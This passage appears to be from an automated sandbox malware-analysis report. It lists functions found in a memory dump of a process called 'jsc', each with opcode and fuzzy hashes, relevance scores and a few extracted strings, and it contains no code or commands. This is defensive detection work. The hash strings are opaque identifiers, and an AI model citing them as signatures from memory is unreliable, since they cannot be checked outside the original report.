                                                            • Instruction ID: 5c7f3660cd3d686e600a78432573850710303e911e1e0efb0424dd662c300a93
                                                            • Opcode Fuzzy Hash: 6cb9164499eafa1debd32b48c1b002f7095b7b185b17c4b7e6625b34fba28fa0
                                                            • Instruction Fuzzy Hash: 7301D831A002088BDB04EF59D88479ABBA5FFC1310F54C268D90C6F29ADBB4ED06C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F67040 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f63982998cd8447e393b2109178098742e58b3d7fca733df45018e66f58b2bc0
                                                            • Instruction ID: dcd3144e74e11cedda69a32bac08cdda636440fedefea3e6bd72f384992717ac
                                                            • Opcode Fuzzy Hash: f63982998cd8447e393b2109178098742e58b3d7fca733df45018e66f58b2bc0
                                                            • Instruction Fuzzy Hash: 9D010439B00104CFC714EB78D5A8AAD77F2EF8C215B5544A8E506DB3A5CF30AD42CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F6099B Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94b49f0d564a219462e051cd98448f41eac2ee1aa6c79ff3c6da0c9cf02d6432
                                                            • Instruction ID: ee56e876fa03e9045e23a515ebf4d25aa7970cd0ecb6b496ca23debdd015cdef
                                                            • Opcode Fuzzy Hash: 94b49f0d564a219462e051cd98448f41eac2ee1aa6c79ff3c6da0c9cf02d6432
                                                            • Instruction Fuzzy Hash: C0F02B11E4D654DAFB35D6F4081822AB642DB9133AB24055DD1DD8B3A3E9018858F3DA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F614D4 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4a2730bbc8760d30f6c9fa325db640994a66351059eb5b55151ffa0478f35ed
                                                            • Instruction ID: 62ed92399a3099be259b6f162de6a86cb89377210b00254c36f33385c79531b9
                                                            • Opcode Fuzzy Hash: c4a2730bbc8760d30f6c9fa325db640994a66351059eb5b55151ffa0478f35ed
                                                            • Instruction Fuzzy Hash: 0DF02B37E04110CBC722CBA888912ACBBB0FE5633072D00D7D506DB312DB39E942E751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F680C0 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf9e553c21358110092d438a7f0d0a90a136c623d2392a597dc0dafbd4aeb579
                                                            • Instruction ID: c4a82bef814dc36e8788c632370cbb9eeb078f1b983fb1c08218fb934a68f7bb
                                                            • Opcode Fuzzy Hash: bf9e553c21358110092d438a7f0d0a90a136c623d2392a597dc0dafbd4aeb579
                                                            • Instruction Fuzzy Hash: ACF0EC74A0124AEFDF05FBB8F981A9D7BF1EB84300F5055AEC205B7295EE706E058B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00F6196A Relevance: 5.3, Strings: 4, Instructions: 293COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PLUm$hJUm$tJUm$KUm
                                                            • API String ID: 0-3120941133
                                                            • Opcode ID: 6e9459e48f3ff5dcf2019425917ca5abc00dbfeb6535579f4ce0acb885e40a9c
                                                            • Instruction ID: bcae436e5debcdeda791084d0f25fa18fedcf909193e789918de74a928021aa5
                                                            • Opcode Fuzzy Hash: 6e9459e48f3ff5dcf2019425917ca5abc00dbfeb6535579f4ce0acb885e40a9c
                                                            • Instruction Fuzzy Hash: 4B91105541F3E09FE707AB6C58B00A53FB0AE9722574E55CBC180CF0A3E858585DE7BA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%